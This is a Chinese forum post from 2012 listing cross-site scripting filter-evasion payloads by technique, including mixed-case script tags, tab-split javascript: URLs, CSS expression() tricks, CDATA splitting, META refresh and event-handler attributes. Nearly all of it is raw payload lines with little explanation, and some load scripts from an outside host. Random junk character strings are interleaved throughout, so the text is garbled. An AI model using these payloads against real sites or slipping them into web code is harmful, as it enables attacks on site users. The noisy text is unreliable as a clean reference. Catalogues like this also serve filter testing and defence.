1. 改变字符大小写
/ [. q. a+ [. R7 Z1 E& {2 N. \8 \+ @+ i: z9 p% j' |4 Z
- A9 G# @( j$ I/ U9 Y4 c
" d, u& a2 L" e <sCript>alert(‘d’)</scRipT>
' O) i4 }/ r% r$ C# Q
. F% W/ ~" q4 Q7 c2. 利用多加一些其它字符来规避Regular Expression的检查% n' [- |* L- |9 S
1 y Y/ W# |! C9 h2 G' I <<script>alert(‘c’)//<</script>
3 s; y6 e8 N6 s% J: W" B/ P# { u9 P* D/ t, F; i6 w5 d9 B
<SCRIPT a=">" SRC="t.js"></SCRIPT>4 \; _( [' N+ H) y4 a! r7 A! s" L
' y( g0 ]: Q0 d, ~2 A$ o& a1 R8 _
<SCRIPT =">" SRC="t.js"></SCRIPT>/ c! H2 @ B, O0 \, e; l
, Y- J' L- ` N" Q. F/ H* }) F
<SCRIPT a=">" ” SRC="t.js"></SCRIPT># _/ e8 G# ^" o$ ~, t' ]* y1 I
. n, f# ~8 W5 C& T+ b; ^4 f <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
; g+ w) T0 @' Q& b) s4 e( f' r! m4 n/ X
<SCRIPT a=`>` SRC="t.js"></SCRIPT>+ q$ u8 F; W5 v. E) S% m2 X; {" O0 w
3 I$ p6 S, x1 R' w D; U9 K; H <SCRIPT a=">’>" SRC="t.js"></SCRIPT>: w) _$ p6 M+ v; v/ h
% k: j% b/ c8 n3 @7 n3 b8 {- u
3. 以其它扩展名取代.js
; ?: N; b% v, @% u% i' v
4 c* y9 `' s: ?0 w6 ] <script src="bad.jpg"></script>/ u j; x7 ]' I. d0 S
7 ~* J: ?% E) U, Q/ w2 B) D* O9 Z
4. 将Javascript写在CSS档里
# W- E1 a9 o0 g7 b# G, r3 b7 j" @/ r: c& u
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
3 W2 g# q" C9 E$ Z! A
$ V& v$ V5 Y; y example:! E7 C6 v3 x, O" C
- V l, j# W- ]0 X3 Z0 J+ x H
body {, B9 o2 L# L: U
& u' }+ ]' A2 y( ` background-image: url(‘javascript:alert("XSS");’)
- d4 I+ f4 |6 J9 R2 }' n- t; o
& g' R/ _& Z2 |! M }
' a! {( [( L+ O- ?7 T K4 d" O1 O
* q7 S" U% z6 ]4 Y6 S5. 在script的tag里加入一些其它字符8 y) s# D, A+ c8 T K3 o
& n; H% V' p0 ~) H- o' u) e
<SCRIPT/SRC="t.js"></SCRIPT>
, C4 J- L* x7 p/ q3 I6 {& O4 x
3 `5 A, ^+ t: ~ L4 f1 m. d <SCRIPT/anyword SRC="t.js"></SCRIPT>
- D3 `# X5 t- k3 j) \6 ~% f& p) e- P; d. p- k9 H& Y3 V
6. 使用tab或是new line来规避) A$ Q6 W8 M8 ?! @) X4 W. ?
2 g! O7 w* M4 n% V <img src="jav ascr ipt:alert(‘XSS3′)">
3 D+ W% j- ^6 ~4 m5 m; I( X
3 s c# A, J |5 z% M5 O" e <img src="jav ascr ipt:alert(‘XSS3′)">
: ^, k8 l q( ]' X! r: f# Q* F5 i: z4 r4 E0 }4 Y" L( Z
<IMG SRC="jav ascript:alert(‘XSS’);">2 A g' g3 m1 \
$ g1 F7 G/ i% i( J+ |8 ]$ |! g! O
-> tag
9 {6 q9 U/ p l& P5 B2 z' J# Q! S7 C3 b2 |, a; J
-> new line) I1 j0 c4 y7 k' K5 p
; h0 a, m7 @# V( i' p
7. 使用"\"来规避
9 Y% @8 v+ V. {) d0 O6 F: X
" _8 c. Z4 ?8 @, ` <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>) X6 f8 w6 b- t9 Y
' }9 S. {( l. d a; Q5 n <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
6 y. e, I. u, k, Z! A1 K, o1 |- m) o
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
2 B7 T% P9 u, e8 X5 V- l) I/ m: K* n
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">3 i6 ?$ a% y5 n# `
4 p# D2 m" t3 @
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
: X, c2 ] @/ J- x% D1 U8 s7 v
) p8 D# p% y( {& h8. 使用Hex encode来规避(也可能会把";"拿掉). o. z" S- v+ n5 U; Z9 |
- |& Z6 u$ X/ ]8 n1 |9 s( E
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">: f3 s% \2 Q! \% w E" S: {
& j, J6 ~1 ~+ a! t' B6 J
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
6 V1 r- o) U: _6 m0 s* f
: _7 [6 \7 u5 r9 \ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">3 @" [- `# o% x1 C; ^
, f U& O4 J0 v7 i) J 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">1 z7 e# G8 V' ^5 ]* \" b
0 |/ A% I' ~! y! ~$ ^! m
9. script in HTML tag( E) G0 x) `( d/ b3 P
- @2 P: i% K4 B4 }) G; _ J/ h
<body onload=」alert(‘onload’)」>
5 x/ A6 s; A5 Y& G/ h/ p. I% D! A: H% y: S4 v M+ k
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
: G! j2 W5 A* ]/ j4 M8 F2 U$ k8 S9 }7 T# g9 N- k
10. 在swf里含有xss的code" `) O; F/ C* a6 c, `
. | f) s1 w8 D5 Q: q1 E% h+ _ <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>) B) p# i/ o. A& N7 G8 Y/ |) i- R
" h, l' y) [3 q: f+ |* d" `11. 利用CDATA将xss的code拆开,再组合起来。
# j9 T- Q0 a3 M4 E. J# S. ^5 [8 T8 ^( N
<XML ID=I><X><C>
# \! o) c2 c ~( I( |) Y& ` L- ] b& [% ^, L: D
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
1 N* b6 h5 p5 ~9 g* D' l8 {, n- w: m: h) X& V8 Y1 U I2 h
</C></X>4 Z& g, N0 n9 g: K# u
$ N% ?- J( U x. X6 c </xml>. K/ ^* T9 h5 j5 a
5 `7 F J. I: A3 R! Z
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
3 s ~7 V; |# m4 Z4 t
# Y) B+ O( u) r: P G <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>7 m% U9 v* }* X- g, n" G7 M
4 I( t% X2 @! h! j# B( u, _! r <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
, P j% r1 ~0 }. w) N, K7 {# K% C. |! w; L
12. 利用HTML+TIME。
* u3 o$ k4 A' @# i: Z6 s* t0 _4 g
<HTML><BODY>8 k4 x$ P5 S Q6 j) P2 H4 I
, p; x9 H. e5 \$ Z# Z
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
* n- C7 P- Q% g( K2 t0 I0 s9 Y% v, C w) w' l5 r
<?import namespace="t" implementation="#default#time2">
5 Q3 N( Z& ^% W, d0 C, |" A
# q9 D* i* ~; ] {' e7 d <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
: x. }( ]! l* T4 W5 R
! M) t# i1 K# P, j$ G4 [ </BODY></HTML>( V: a4 t3 M" F& Z% o/ k
$ A& \- }4 |, y13. 透过META写入Cookie。
3 N) E8 V/ y* \5 u0 Z# H( w
* ? l7 Y; E- C& H ~0 s$ n b* b <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">. H- M$ h# A! j p4 ^( ^& E: t
3 B. v* f& r$ A' c/ v& t0 |14. javascript in src , href , url
- {- J4 E- {& c" s' J# |2 X' M W, R$ V5 |2 i: s: T
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
* x$ n4 U/ Q! J
7 X7 U3 N; g( Y5 h' l' ?; A <img src="javascript:alert(‘XSS3′)"># a1 u/ p$ G/ H( k* i
1 H" O! n j* h* O
<IMG DYNSRC="javascript:alert(‘XSS20′)">" P2 j2 {/ N1 D% @* L( D8 ?
# ?7 t* e7 q1 U
<IMG LOWSRC="javascript:alert(‘XSS21′)">' [; h- k6 s+ P' o
" g1 @0 [8 W) N
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">9 ?* ~$ C* f) v7 X% @7 W8 F
6 ~+ s. ]: C& C) ~
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
3 M* W4 E- `: H. B, n* a% U" I6 d; \" Z2 |4 `3 Y
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">; L1 c7 L' ~7 O' c
2 n+ E+ F* S8 {- e# |( d8 p
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">, P; e1 a( N" i& ?( ^
/ H/ a9 l8 o# w1 @, e; ` <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}; E- V2 l0 e# I0 ]
9 K! L1 _. t5 g' T4 O9 o; s, d# e </STYLE><A CLASS=XSS></A>3 s& m* w" [; n! e$ c+ a* ?
. i& h t& O4 j1 D& Z
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>+ ]- ?. F" V& z t
* N/ H. C# h: l9 L" S7 M0 Q' C
|
发表于 2012-12-31 09:59:28
收藏
支持
反对